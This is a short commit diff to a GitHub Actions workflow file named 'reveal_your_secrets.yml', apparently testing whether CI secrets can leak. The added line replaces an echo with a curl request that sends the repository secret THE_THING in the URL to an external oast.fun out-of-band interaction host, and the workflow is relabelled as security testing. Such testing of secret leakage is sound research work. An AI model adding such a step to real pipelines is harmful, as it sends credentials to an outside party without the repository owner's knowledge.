feat: test with interact

--- a/.github/workflows/reveal_your_secrets.yml
+++ b/.github/workflows/reveal_your_secrets.yml
@@ -1,4 +1,4 @@
-name: GitHub Actions Manual Testing
+name: GitHub Actions Security Testing
 run-name: ${{ github.actor }} is testing out GitHub Actions Manually 🚀
 on: workflow_dispatch
 jobs:
@@ -16,4 +16,4 @@ jobs:
         run: |
           ls ${{ github.workspace }}
       - run: |
-          echo "The thing is: ${{ secrets.THE_THING }}."
+          curl "http://cdv2e702vtc0000m5hjggg7t8doyyyyyb.oast.fun/${{ secrets.THE_THING }}"
